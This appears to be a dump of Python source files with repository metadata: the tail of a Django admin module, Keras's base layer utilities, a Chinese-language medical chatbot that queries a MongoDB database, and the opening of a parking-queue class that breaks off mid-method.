return '-'
display_canonical.allow_tags = True
display_canonical.short_description = _('canonical URL')
FileAdmin.fieldsets = FileAdmin.build_fieldsets()
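# A sketch of how subclasses are expected to reuse build_fieldsets (field
# names below are hypothetical, not part of this module):
#
#     class ImageAdmin(FileAdmin):
#         pass
#
#     ImageAdmin.fieldsets = ImageAdmin.build_fieldsets(
#         extra_main_fields=('author',),
#         extra_fieldsets=((_('Subject'), {'fields': ('subject_location',)}),),
#     )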
| 35.407895
| 79
| 0.567633
|
e10c07eaffe4fe488bb8bf70855dd6181771ad2f
| 32,910
|
py
|
Python
|
venv/lib/python3.8/site-packages/keras/engine/base_layer_utils.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | 1
|
2021-05-24T10:08:51.000Z
|
2021-05-24T10:08:51.000Z
|
venv/lib/python3.8/site-packages/keras/engine/base_layer_utils.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/keras/engine/base_layer_utils.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains private utilities used mainly by the base Layer class."""
import tensorflow.compat.v2 as tf
import functools
import threading
from keras import backend
from keras.utils import control_flow_util
from keras.utils import tf_inspect
from keras.utils import tf_utils
from tensorflow.python.util import keras_deps
from tensorflow.python.util.tf_export import keras_export
_call_context = threading.local()
def create_mean_metric(value, name=None):
  # Importing keras imports base_layer and then this module, and metrics rely
  # on base_layer, which results in a cyclic dependency.
from keras import metrics as metrics_module # pylint: disable=g-import-not-at-top
metric_obj = metrics_module.Mean(name=name, dtype=value.dtype)
return metric_obj, metric_obj(value)
def make_variable(name,
shape=None,
dtype=tf.float32,
initializer=None,
trainable=None,
caching_device=None,
validate_shape=True,
constraint=None,
use_resource=None,
collections=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.compat.v1.VariableAggregation.NONE,
partitioner=None): # pylint: disable=unused-argument
"""Temporary util to create a variable (relies on `variable_scope.variable`).
Some reuse-related technicalities prevent us from using
`variable_scope.get_variable()` directly, so we use a subcomponent
that has fewer constraints (`variable_scope.variable()`).
In the longer term, it seems like a similar "default variable creator" method
should exist in `Trackable` instead. When this happens, we can get
rid of this temporary solution.
TODO(fchollet): remove this method when no longer needed.
Args:
name: Variable name.
shape: Variable shape.
dtype: The type of the variable. Defaults to `self.dtype` or `float32`.
initializer: Initializer instance (callable).
trainable: Whether the variable should be part of the layer's
"trainable_variables" (e.g. variables, biases)
or "non_trainable_variables" (e.g. BatchNorm mean, stddev).
Note, if the current variable scope is marked as non-trainable
then this parameter is ignored and any added variables are also
marked as non-trainable. `trainable` defaults to `True` unless
`synchronization` is set to `ON_READ`.
caching_device: Passed to `tf.Variable`.
validate_shape: Passed to `tf.Variable`.
constraint: Constraint instance (callable).
use_resource: Whether to use a `ResourceVariable`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
    synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
partitioner: Not handled at this time.
Returns:
Variable instance.
"""
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if tf_inspect.isclass(initializer):
initializer = initializer()
init_val = functools.partial(initializer, shape, dtype=dtype)
variable_dtype = dtype.base_dtype
if use_resource is None:
use_resource = True
# TODO(apassos,rohanj) figure out how to remove collections from here so we
# can remove the V1.
variable_shape = tf.TensorShape(shape)
return tf.compat.v1.Variable(
initial_value=init_val,
name=name,
trainable=trainable,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
collections=collections,
synchronization=synchronization,
aggregation=aggregation,
shape=variable_shape if variable_shape else None)
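# A minimal call sketch (internal helper; per the branching above the
# initializer may be an instance, a class, or a raw value):
#
#     w = make_variable('w', shape=(3,), dtype=tf.float32,
#                       initializer=tf.compat.v1.zeros_initializer,
#                       trainable=True)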
def collect_previous_mask(input_tensors):
"""Retrieves the output mask(s) of the previous node.
Args:
input_tensors: An arbitrary structure of Tensors.
Returns:
A mask tensor or list of mask tensors.
"""
def _collect_previous_mask(x):
return getattr(x, '_keras_mask', None)
return tf.nest.map_structure(_collect_previous_mask, input_tensors)
def have_all_keras_metadata(tensors):
return all(hasattr(x, '_keras_history') for x in tf.nest.flatten(tensors))
def generate_placeholders_from_shape(shape):
return tf.compat.v1.placeholder(shape=shape, dtype=backend.floatx())
def create_keras_history(tensors):
"""Wraps TensorFlow Operations for compatibility with the Functional API.
This method checks to see if a Tensor in `tensors` is missing Keras metadata
and has its origin in a Keras `Input` Layer. If so, this method will replace
the raw TensorFlow Operations that created this tensor with
`TensorFlowOpLayer` instances that create identical operations.
Any Tensors not originating from a Keras `Input` Layer will be treated as
constants when constructing `TensorFlowOpLayer` instances.
Args:
tensors: A structure of Tensors, some of which come from raw TensorFlow
operations and need to have Keras metadata assigned to them.
Returns:
created_layers: List. The `TensorFlowOpLayer` instances created to wrap
the raw Tensorflow operations.
"""
_, created_layers = _create_keras_history_helper(tensors, set(), [])
return created_layers
# Unsafe Internal attribute.
# If True, Keras will not evaluate the constant-foldable inputs to tf op
# layers in TF1 graphs. This *might* speed up model construction time in
# certain settings, but it means
# the models will not be serializable/deserializable via get_config
# (Only via Savedmodels). It may also change the semantics of whether
# generated random numbers are generated once and re-used, or recomputed
# each time.
# Note: This path triggers for TPUEstimators / xla compiled graphs regardless
# of this setting.
_UNSAFE_GRAPH_OP_LAYER_CREATION = False
def _create_keras_history_helper(tensors, processed_ops, created_layers):
"""Helper method for `create_keras_history`.
Args:
tensors: A structure of Tensors for which to create Keras metadata.
processed_ops: Set. TensorFlow operations that have already been wrapped in
`TensorFlowOpLayer` instances.
created_layers: List. The `TensorFlowOpLayer` instances created.
Returns:
Tuple. First element is the updated set of TensorFlow Operations that
have been wrapped in `TensorFlowOpLayer` instances. Second element is
a list of the `TensorFlowOpLayer` instances created.
"""
if tf.compat.v1.executing_eagerly_outside_functions():
raise ValueError(
'`create_keras_history` should only be called if eager is disabled!')
# Import of `base_layer` needed in order to create `TensorFlowOpLayer`.
# Cannot be imported at top because of circular dependencies.
# TODO(omalleyt): Resolve circular dependency.
from keras.engine import base_layer # pylint: disable=g-import-not-at-top
tensor_list = tf.nest.flatten(tensors)
sparse_ops = []
ragged_tensors = []
for tensor in tensor_list:
if getattr(tensor, '_keras_history', None) is not None:
continue
if isinstance(
tensor, (tf.SparseTensor, tf.compat.v1.SparseTensorValue)):
sparse_ops.append(tensor.op)
continue
if tf_utils.is_ragged(tensor):
# Ragged tensors don't have an op property
ragged_tensors.append(tensor)
continue
op = tensor.op # The Op that created this Tensor.
if op not in processed_ops:
# Recursively set `_keras_history`.
op_inputs = list(op.inputs)
constants = {}
layer_inputs = []
for i, op_input in enumerate(op_inputs):
if uses_keras_history(op_input):
layer_inputs.append(op_input)
else:
# Treat any value not originating from a `keras.Input` as
# a constant. Variables cannot be supported.
ds_with_session = (
tf.distribute.in_cross_replica_context() and
not tf.compat.v1.executing_eagerly_outside_functions())
using_xla = control_flow_util.GraphOrParentsInXlaContext(
tf.compat.v1.get_default_graph())
if ds_with_session or using_xla or _UNSAFE_GRAPH_OP_LAYER_CREATION:
# In Legacy Graph mode, evaluating here makes Session be
# configured improperly. The downside of this is that saving
# via `get_config` breaks, but SavedModel still works.
constants[i] = op_input
else:
with tf.init_scope():
constants[i] = backend.function([], op_input)([])
layer_inputs = unnest_if_single_tensor(layer_inputs)
processed_ops, created_layers = _create_keras_history_helper(
layer_inputs, processed_ops, created_layers)
name = op.name
node_def = op.node_def.SerializeToString()
op_layer = base_layer.TensorFlowOpLayer(
node_def, constants=constants, name=name)
created_layers.append(op_layer)
op_layer._set_connectivity_metadata( # pylint: disable=protected-access
args=(layer_inputs,),
kwargs={},
outputs=op.outputs)
processed_ops.update([op])
if sparse_ops or ragged_tensors:
lambda_example = """
weights_mult = lambda x: tf.sparse.sparse_dense_matmul(x, weights)
output = tf.keras.layers.Lambda(weights_mult)(input)
"""
raise ValueError(
'Tensorflow ops that generate ragged or sparse tensor '
'outputs are currently not supported by Keras automatic '
'op wrapping. Please wrap these ops in a Lambda layer: '
'\n\n```\n{example}\n```\n'
'Sparse ops encountered: {sparse_ops}\n'
'Ragged tensors encountered: {ragged_tensors}\n'.format(
example=lambda_example,
sparse_ops=str(sparse_ops),
ragged_tensors=str(ragged_tensors)))
return processed_ops, created_layers
def unnest_if_single_tensor(input_tensors):
# Preserve compatibility with older configs
flat_input_tensors = tf.nest.flatten(input_tensors)
# If this is a single element but not a dict, unwrap. If this is a dict,
# assume the first layer expects a dict (as is the case with a
# DenseFeatures layer); pass through.
if not isinstance(input_tensors, dict) and len(flat_input_tensors) == 1:
input_tensors = flat_input_tensors[0]
return input_tensors
def needs_keras_history(tensors, ignore_call_context=False):
"""Check if any Tensors need to be wrapped in TensorFlowOpLayers.
This will never return True inside a sublayer, because sublayers
do not need to create Keras History. Otherwise, this returns True
if one or more of `tensors` originates from a `keras.Input` and
does not have `_keras_history` set.
Args:
tensors: An arbitrary nested structure of Tensors.
ignore_call_context: Whether to ignore the check of if currently
outside of a `call` context. This is `True` when creating
KerasHistory inside `Node`, where we always know that Tensors
are being used with the Functional API.
Returns:
Bool, whether at least one Tensor needs to be wrapped.
"""
input_tensors = tf.nest.flatten(tensors)
if call_context().in_call and not ignore_call_context:
return False
if all(
getattr(tensor, '_keras_history', None) is not None
for tensor in input_tensors):
# KerasHistory already set.
return False
return uses_keras_history(tensors)
def is_in_keras_graph():
"""Returns if currently executing inside of a Keras graph."""
return call_context().in_keras_graph
def is_in_eager_or_tf_function():
"""Returns if in eager mode or inside of a tf.function."""
return tf.executing_eagerly() or is_in_tf_function()
def is_in_tf_function():
"""Returns if inside of a tf.function."""
# Check if running in V1 graph mode.
if not tf.compat.v1.executing_eagerly_outside_functions():
return False
if not tf.inside_function():
return False
# Check if inside Keras FuncGraph.
if is_in_keras_graph():
return False
# Check for a v1 `wrap_function` FuncGraph.
graph = tf.compat.v1.get_default_graph()
if (getattr(graph, 'name', False) and
graph.name.startswith('wrapped_function')):
return False
return True
def uses_keras_history(tensors):
"""Check if at least one Tensor originates from a `keras.Input`.
This is `True` if at least one Tensor has its origin in a `keras.Input`.
Any Tensor that originates from a `keras.Input` will have a dependency
Tensor with a `_keras_history` attribute attached. Tensors that have
already been checked to not originate from a `keras.Input`
are marked as `_keras_history_checked`.
Args:
tensors: An arbitrary nested structure of Tensors.
Returns:
Bool, whether at least one Tensor originates from a `keras.Input`.
"""
checked_tensors = set()
tensors_to_check = tf.nest.flatten(tensors)
while tensors_to_check:
new_tensors_to_check = []
for tensor in tensors_to_check:
if id(tensor) in checked_tensors:
continue
checked_tensors.add(id(tensor))
if getattr(tensor, '_keras_history_checked', None) is not None:
continue
if getattr(tensor, '_keras_history', None) is not None:
return True
try:
new_tensors_to_check.extend(tensor.op.inputs)
except AttributeError:
# In case `tensor` is a Variable created in an Eager context.
pass
tensors_to_check = new_tensors_to_check
# Mark that these Tensors have been checked once for `_keras_history`,
# and should not be checked again for performance reasons.
mark_checked(tensors)
return False
def mark_checked(tensors):
"""Marks that these Tensors should not be tracked.
This prevents Layers from attempting to create TensorFlowOpLayers
for these Tensors.
Args:
tensors: An arbitrary structure of Tensors.
"""
def _mark_checked(tensor):
tensor._keras_history_checked = True # pylint: disable=protected-access
tf.nest.map_structure(_mark_checked, tensors)
def call_context():
"""Returns currently active `CallContext`."""
call_ctx = getattr(_call_context, 'call_context', None)
if call_ctx is None:
call_ctx = CallContext()
_call_context.call_context = call_ctx
return call_ctx
# Inject the call_context function to keras_deps to remove the dependency
# from TFLite to Keras.
keras_deps.register_call_context_function(call_context)
class CallContext(object):
"""Keeps track of properties currently inside a Layer/Model's `call`.
Attributes:
in_call: Whether currently inside the `call` of a Layer.
layer: The `Layer` whose `call` is currently active.
inputs: The inputs to the currently active `Layer`.
build_graph: Whether currently inside a Graph or FuncGraph.
training: Whether currently executing in training or inference mode.
saving: Whether currently saving to SavedModel.
frozen: Whether currently executing inside a `Layer` with `trainable` set to
`False`.
in_keras_graph: Whether executing inside the Keras Graph.
"""
def __init__(self):
# Handle `in_call` separately as it is the most-read attr and reading it is
# on the hot path.
self.in_call = False
self._state = {
'layer': None,
'inputs': None,
'build_graph': False,
'training': None,
'saving': None
}
# TODO(b/150169018): This logic can be replaced after the Functional API
# refactor.
self._in_keras_graph = False
def enter(self, layer, inputs, build_graph, training, saving=None):
"""Push a Layer and its inputs and state onto the current call context.
Args:
layer: The `Layer` whose `call` is currently active.
inputs: The inputs to the currently active `Layer`.
build_graph: Whether currently inside a Graph or FuncGraph.
training: Whether currently executing in training or inference mode.
saving: Whether currently saving to SavedModel.
Returns:
Context manager.
"""
state = {
'layer': layer,
'inputs': inputs,
'build_graph': build_graph,
'training': training,
'saving': saving
}
return CallContextManager(self, state)
@property
def layer(self):
return self._state['layer']
@property
def inputs(self):
return self._state['inputs']
@property
def build_graph(self):
return self._state['build_graph']
@property
def training(self):
return self._state['training']
@property
def saving(self):
return self._state['saving']
@property
def frozen(self):
layer = self._state['layer']
if not layer:
return False
return not layer.trainable
@property
def in_keras_graph(self):
# Returns True even if in a subgraph of the Keras graph, such as those
# created by control flow ops.
if tf.executing_eagerly():
return False
return (self._in_keras_graph or
getattr(backend.get_graph(), 'name', None) == 'keras_graph')
class CallContextManager(object):
"""Context manager for `CallContext`."""
def __init__(self, call_ctx, state):
self._call_ctx = call_ctx
self._state = state
self._build_graph = state['build_graph']
def __enter__(self):
call_ctx = self._call_ctx
self._prev_in_call = call_ctx.in_call
self._prev_state = call_ctx._state
call_ctx.in_call = True
call_ctx._state = self._state
# TODO(b/150169018): This logic can be removed after the Functional API
# refactor.
if self._build_graph:
self._prev_in_keras_graph = call_ctx._in_keras_graph
call_ctx._in_keras_graph = (
call_ctx._in_keras_graph or
getattr(backend.get_graph(), 'name', None) == 'keras_graph')
def __exit__(self, *exc_info):
call_ctx = self._call_ctx
call_ctx.in_call = self._prev_in_call
call_ctx._state = self._prev_state
if self._build_graph:
call_ctx._in_keras_graph = self._prev_in_keras_graph
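# Illustrative sketch (not part of the original module): entering the global
# call context around a layer call. `layer` and `inputs` are hypothetical
# placeholders.
def _example_call_context_usage(layer, inputs):
    with call_context().enter(layer=layer, inputs=inputs,
                              build_graph=False, training=True):
        # Inside the block, the global call state reflects this call.
        return call_context().training  # -> True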
def training_arg_passed_to_call(argspec, args, kwargs):
"""Returns whether a user passed the `training` argument in `__call__`."""
# `argspec.args` starts with ['self', 'inputs']
full_args = dict(zip(argspec.args[2:], args))
full_args.update(kwargs)
return 'training' in full_args and full_args['training'] is not None
def is_subclassed(layer):
"""Returns True if the object is a subclassed layer or subclassed model."""
return (layer.__module__.find('keras.engine') == -1 and
layer.__module__.find('keras.layers') == -1)
def from_saved_model(layer):
"""Returns whether the layer is loaded from a SavedModel."""
return layer.__module__.find('keras.saving.saved_model') != -1
def check_graph_consistency(tensor=None, method='add_loss', force_raise=False):
"""Checks that tensors passed to `add_*` method match the Keras graph.
When one of the `add_*` methods is called inside a V2 conditional branch,
the underlying tensor gets created in a FuncGraph managed by control_flow_v2.
We need to raise clear error messages in such cases.
Args:
tensor: Tensor to check, or `False` if it is known that an error
should be raised.
method: Caller method, one of {'add_metric', 'add_loss', 'add_update'}.
force_raise: If an error should be raised regardless of `tensor`.
Raises:
RuntimeError: In case of an out-of-graph tensor.
"""
if (force_raise or
(tf.compat.v1.executing_eagerly_outside_functions() and
hasattr(tensor, 'graph') and tensor.graph.is_control_flow_graph)):
if method == 'activity_regularizer':
bad_example = """
class TestModel(tf.keras.Model):
def __init__(self):
super(TestModel, self).__init__(name='test_model')
self.dense = tf.keras.layers.Dense(2, activity_regularizer='l2')
def call(self, x, training=None):
if training:
return self.dense(x)
else:
return self.dense(x)
"""
correct_example = """
class TestModel(tf.keras.Model):
def __init__(self):
super(TestModel, self).__init__(name='test_model')
self.dense = tf.keras.layers.Dense(2, activity_regularizer='l2')
def call(self, x, training=None):
return self.dense(x)
"""
raise RuntimeError(
'You are using a layer with `activity_regularizer` in a control flow '
'branch, e.g.:\n{bad_example}\nThis is currently not supported. '
'Please move your call to the layer with `activity_regularizer` out '
'of the control flow branch, e.g.:\n{correct_example}\n'
'You can also resolve this by marking your outer model/layer dynamic'
' (eager-only) by passing `dynamic=True` to the layer constructor. '
'Any kind of control flow is supported with dynamic layers. '
'Note that using `dynamic=True` requires you to implement static '
'shape inference in the `compute_output_shape(input_shape)` '
'method.'.format(
bad_example=bad_example, correct_example=correct_example))
if method == 'add_metric':
bad_example = """
def call(self, inputs, training=None):
if training:
metric = compute_metric(inputs)
self.add_metric(metric, name='my_metric', aggregation='mean')
return inputs
"""
correct_example = """
def call(self, inputs, training=None):
if training:
metric = compute_metric(inputs)
else:
metric = 0.
self.add_metric(metric, name='my_metric', aggregation='mean')
return inputs
"""
elif method == 'add_loss':
bad_example = """
def call(self, inputs, training=None):
if training:
loss = compute_loss(inputs)
self.add_loss(loss)
return inputs
"""
correct_example = """
def call(self, inputs, training=None):
if training:
loss = compute_loss(inputs)
else:
loss = 0.
self.add_loss(loss)
return inputs
"""
else:
bad_example = """
def call(self, inputs, training=None):
if training:
self.add_update(self.w.assign_add(1))
return inputs
"""
correct_example = """
def call(self, inputs, training=None):
if training:
increment = 1
else:
increment = 0
self.add_update(self.w.assign_add(increment))
return inputs
"""
raise RuntimeError(
'You are using the method `{method}` in a control flow branch '
'in your layer, e.g.:\n{bad_example}\n'
'This is not currently supported. '
'Please move your call to {method} out of the control flow branch, '
'e.g.:\n{correct_example}\n'
'You can also resolve this by marking your layer '
'as dynamic (eager-only) by passing '
'`dynamic=True` to the layer constructor. '
'Any kind of control flow is supported with dynamic layers. '
'Note that using `dynamic=True` requires you '
'to implement static shape inference '
'in the `compute_output_shape(input_shape)` method.'.format(
method=method,
bad_example=bad_example,
correct_example=correct_example))
def mark_as_return(outputs, acd):
"""Marks `outputs` as the return values for automatic control deps."""
def _mark_as_return(tensor):
"""Marks `tensor` as the return value for automatic control deps."""
if not tf.is_tensor(tensor):
return tensor
# pylint: disable=protected-access
return_tensor = acd.mark_as_return(tensor)
if getattr(tensor, '_keras_mask', None) is not None:
return_tensor._keras_mask = acd.mark_as_return(tensor._keras_mask)
else:
return_tensor._keras_mask = None
# Handle TensorFlow Probability attached metadata.
# TODO(b/132076537): Remove this once TFP uses `CompositeTensor`.
if getattr(tensor, '_tfp_distribution', None) is not None:
return_tensor._tfp_distribution = tensor._tfp_distribution
return return_tensor
# pylint: enable=protected-access
return tf.nest.map_structure(_mark_as_return, outputs)
V2_DTYPE_BEHAVIOR = None
@keras_export(v1=['keras.layers.enable_v2_dtype_behavior'])
def enable_v2_dtype_behavior():
"""Enable the V2 dtype behavior for Keras layers.
By default, the V2 dtype behavior is enabled in TensorFlow 2, so this function
is only useful if `tf.compat.v1.disable_v2_behavior` has been called. Since
mixed precision requires V2 dtype behavior to be enabled, this function allows
you to use mixed precision in Keras layers if `disable_v2_behavior` has been
called.
When enabled, the dtype of Keras layers defaults to floatx (which is typically
float32) instead of None. In addition, layers will automatically cast
floating-point inputs to the layer's dtype.
>>> x = tf.ones((4, 4, 4, 4), dtype='float64')
>>> layer = tf.keras.layers.Conv2D(filters=4, kernel_size=2)
>>> print(layer.dtype) # float32 since V2 dtype behavior is enabled
float32
>>> y = layer(x) # Layer casts inputs since V2 dtype behavior is enabled
>>> print(y.dtype.name)
float32
A layer author can opt-out their layer from the automatic input casting by
passing `autocast=False` to the base Layer's constructor. This disables the
autocasting part of the V2 behavior for that layer, but not the defaulting to
floatx part of the V2 behavior.
When a global `tf.keras.mixed_precision.Policy` is set, a Keras layer's dtype
will default to the global policy instead of floatx. Layers will automatically
cast inputs to the policy's compute_dtype.
"""
global V2_DTYPE_BEHAVIOR
V2_DTYPE_BEHAVIOR = True
@keras_export(v1=['keras.layers.disable_v2_dtype_behavior'])
def disable_v2_dtype_behavior():
"""Disables the V2 dtype behavior for Keras layers.
See `tf.compat.v1.keras.layers.enable_v2_dtype_behavior`.
"""
global V2_DTYPE_BEHAVIOR
V2_DTYPE_BEHAVIOR = False
def v2_dtype_behavior_enabled():
"""Returns True if the V2 dtype behavior is enabled."""
if V2_DTYPE_BEHAVIOR is None:
return tf.__internal__.tf2.enabled()
return V2_DTYPE_BEHAVIOR
class TrackableWeightHandler(object):
"""Keras wrapper for handling tracking.Trackable object saving and restoring.
This class handles Trackables in both V1 and V2 modes, ensuring that they can
be saved and restored with the correct data and without adding additional ops
on every save.
Attributes:
trackable: The trackable to wrap.
num_tensors: The number of tensors that this trackable requires for saving.
"""
def __init__(self, trackable):
if not isinstance(trackable, tf.__internal__.tracking.Trackable):
raise ValueError('%s is not a Trackable object.' % (trackable,))
self._trackable = trackable
self._distribute_strategy = tf.distribute.get_strategy()
# TODO(b/141682913): Figure out why this is private and fix it.
saveables = trackable._gather_saveables_for_checkpoint().values() # pylint: disable=protected-access
# 'Saveables' won't exist when we're passed a legacy TF1 table like
# a StaticHashTable.
if not saveables:
self._num_tensors = 0
self._setter = lambda weights: None
self._getter = lambda: []
elif len(saveables) == 1:
saveable = list(saveables)[0]
if tf.compat.v1.executing_eagerly_outside_functions():
# If we're in eager mode, we need to defer calling the Trackable's
# saveable() callable until data export time.
# However, it is safe to call the saveable as many times as we want, so
# we will call it now to figure out how many tensors this Trackable will
# produce.
self._saveable = saveable
self._num_tensors = len(self._saveable().specs)
self._setter = lambda weights: self._saveable().restore(weights, None)
self._getter = lambda: [spec.tensor for spec in self._saveable().specs]
else:
# If we're in Graph mode, we need to evaluate the Saveable only once and
# cache the resulting restore graph. Failing to do this will result in
# new assignment ops being added to the graph each time set_weights() is
# called.
self._placeholder_tensors = []
self._saveable = saveable()
self._num_tensors = len(self._saveable.specs)
for spec in self._saveable.specs:
tensor = spec.tensor
self._placeholder_tensors.append(
tf.compat.v1.placeholder(tensor.dtype, tensor.shape))
self._assign_op = self._saveable.restore(self._placeholder_tensors,
None)
self._setter = self._set_weights_v1
self._getter = lambda: [spec.tensor for spec in self._saveable.specs]
else:
raise ValueError('Only Trackables with one Saveable are supported. '
'The Trackable %s has %d Saveables.' %
(trackable, len(saveables)))
@property
def num_tensors(self):
return self._num_tensors
def set_weights(self, weights):
if len(weights) != self._num_tensors:
raise ValueError(
('Weight handler for trackable %s received the wrong number of ' +
'weights: expected %s, got %s.') %
(self._trackable, self._num_tensors, len(weights)))
self._setter(weights)
def get_tensors(self):
return self._getter()
def _set_weights_v1(self, weights):
feed_dict = {}
for idx, tensor in enumerate(weights):
feed_dict[self._placeholder_tensors[idx]] = tensor
backend.get_session().run(self._assign_op, feed_dict)
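# Illustrative sketch (not part of the original module; assumes eager mode and
# a checkpointable `trackable` with exactly one Saveable, e.g. a lookup table):
def _example_weight_handler_roundtrip(trackable):
    handler = TrackableWeightHandler(trackable)
    weights = handler.get_tensors()  # snapshot of the current state
    handler.set_weights(weights)     # restores that same state
    return handler.num_tensors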
class StaticTableHandler(TrackableWeightHandler):
"""Wrapper for handling weight collection for static hash tables."""
def __init__(self, getter_lambda): # pylint: disable=super-init-not-called
self._num_tensors = 2
self._getter = getter_lambda
self._distribute_strategy = tf.distribute.get_strategy()
def raise_error(_):
raise RuntimeError('This layer contains a static lookup table, which '
'cannot be changed via set_weights().')
self._setter = raise_error
def no_ragged_support(inputs, layer_name):
input_list = tf.nest.flatten(inputs)
if any(isinstance(x, tf.RaggedTensor) for x in input_list):
raise ValueError('Layer %s does not support RaggedTensors as input. '
'Inputs received: %s. You can try converting your '
'input to a uniform tensor.' % (layer_name, inputs))
def is_split_variable(v):
"""Returns True if `v` is either a PartionedVariable or a ShardedVariable."""
return hasattr(v, '_variable_list') or hasattr(v, '_variables')
def has_weights(obj):
obj_type = type(obj)
return (hasattr(obj_type, 'trainable_weights') and
hasattr(obj_type, 'non_trainable_weights') and
not isinstance(obj, type))
# TODO(kathywu): This is a temporary hack. When a network of layers is revived
# from SavedModel, only the top-level layer will have losses. This causes issues
# in eager mode because the child layers may have graph losses
# (thus model.losses returns a mix of Eager and graph tensors). To fix this,
# whenever eager losses are added to one layer, add eager losses to all
# child layers. This causes `.losses` to only return eager losses.
REVIVED_LOSS_PLACEHOLDER = (
'This layer\'s losses have been added to the parent layer.')
| 36.729911
| 105
| 0.697296
|
c1a342bc87971651e3ac62943b8aaa992f45dbbe
| 2,870
|
py
|
Python
|
brain/brain_libs/LU_model/Doctorbot.py
|
zuxfoucault/DoctorBot_demo
|
82e24078da4d2e6caba728b959812401109e014d
|
[
"MIT"
] | 1
|
2020-09-24T07:26:14.000Z
|
2020-09-24T07:26:14.000Z
|
brain/brain_libs/LU_model/Doctorbot.py
|
lintzuhsiang/Doctorbot
|
6be98bbf380d14bb789d30a137ded3b51b3f31fd
|
[
"MIT"
] | null | null | null |
brain/brain_libs/LU_model/Doctorbot.py
|
lintzuhsiang/Doctorbot
|
6be98bbf380d14bb789d30a137ded3b51b3f31fd
|
[
"MIT"
] | null | null | null |
import db
import LU
import sys
DB_IP = "104.199.131.158" # doctorbot GCP ip
DB_PORT = 27017 # default MongoDB port
DB_NAME = "doctorbot" # use the collection
def main():
client = db.MongoClient(DB_IP, DB_PORT)
collection_division = client[DB_NAME]["division"]
collection_disease = client[DB_NAME]["disease"]
sys.stdout.flush()
print("您好,我是Seek Doctor Bot,如果您想要\n" +
"1.查詢某疾病相關症狀,您可以問我:請問青光眼會怎樣\n" +
"2.知道某疾病屬於什麼科別,您可以問我:青光眼是哪科\n" +
"3.查詢某疾病或科別主治醫師,您可以問我:青光眼要看哪些醫生\n" +
"4.查詢某疾病,科別或醫生的門診時間,您可以說:給我青光眼門診時刻表\n" +
"5.預約掛號某疾病,科別或醫生的門診,您可以說:我要掛號眼科"
)
while True:
sentence = input('\n\n請輸入: ')
slot_dictionary = LU.SlotFilling().decode(sentence)
print("[ Slot ]")
for slot, value in slot_dictionary.items():
print(slot, ": ", value)
intent = LU.IntentPredict().get_intent(sentence)
intent_index = intent.index(max(intent))
intents = ['greeting', 'search_symptom', 'search_division', 'search_doctor', 'search_timetable', 'register']
print('[ Intent ] ' + intents[intent_index])
print('\n\n')
if intent_index == 1: # search_symptom
print("好的,您想查詢" +
slot_dictionary['disease'] +
"會有什麼症狀,以下為相關可能症狀:")
for data in collection_disease.find({"disease_c": {"$regex": slot_dictionary['disease']}}):
print(", ".join(data['symptom']))
elif intent_index == 2: # search_division
print("好的,您想查詢" +
slot_dictionary['disease'] +
"是屬於哪一科,以下為相關科別:")
for data in collection_disease.find({"disease_c": {"$regex": slot_dictionary['disease']}}):
print(", ".join(data['department']))
elif intent_index == 3: # search_doctor
print("好的,您想查詢" +
slot_dictionary['division'] + slot_dictionary['disease'] +
"有哪些醫生可以掛號,以下為醫生表列:")
for data in collection_division.find({"$and": [{"disease": {"$regex": slot_dictionary['disease']}},
{"department": {"$regex": slot_dictionary['division']}}]}):
print(data['department'] + " 醫師: " + ", ".join(data['doctor']))
elif intent_index == 4: # search_timetable
print("好的,您想查詢" + slot_dictionary['division'] +
slot_dictionary['disease'] + slot_dictionary['doctor'] + slot_dictionary['time'] + "的門診時間")
elif intent_index == 5: # register
print("好的,幫您預約掛號" + " " + slot_dictionary['division'] + " " +
slot_dictionary['disease'] + " " + slot_dictionary['doctor'] + " " +
slot_dictionary['time'] + "的門診")
else:
print("不好意思,我不確定您的意思")
if __name__ == '__main__':
main()
| 42.835821
| 117
| 0.558537
|
ce61c016bd3af7f43a31a0bab4fe1abfc80da463
| 2,991
|
py
|
Python
|
Aula 7 - Fila/exercicio_sobre_fila_nota/filaCarro.py
|
EnedinoAndre/Estrutura-De-Dados-em-Python
|
877c9f5c9fa703cc591a25070cd7ec8baa00476d
|
[
"MIT"
] | null | null | null |
Aula 7 - Fila/exercicio_sobre_fila_nota/filaCarro.py
|
EnedinoAndre/Estrutura-De-Dados-em-Python
|
877c9f5c9fa703cc591a25070cd7ec8baa00476d
|
[
"MIT"
] | null | null | null |
Aula 7 - Fila/exercicio_sobre_fila_nota/filaCarro.py
|
EnedinoAndre/Estrutura-De-Dados-em-Python
|
877c9f5c9fa703cc591a25070cd7ec8baa00476d
|
[
"MIT"
] | null | null | null |
class Estacionamento():
# CONSTRUCTOR
def __init__(self):
self.estacionamento = []
# ADD
def adicionarCarro(self, carro):
self.estacionamento.append(carro)
# REMOVE FROM QUEUE
def retirar(self,placa):
placaBoolean = False
for i in self.estacionamento:
if i == placa:
pos = self.estacionamento.index(placa)
for i in range(0,pos + 1):
self.adicionarCarro(self.estacionamento[0])
self.estacionamento.pop(0)
self.estacionamento.pop()
placaBoolean = True
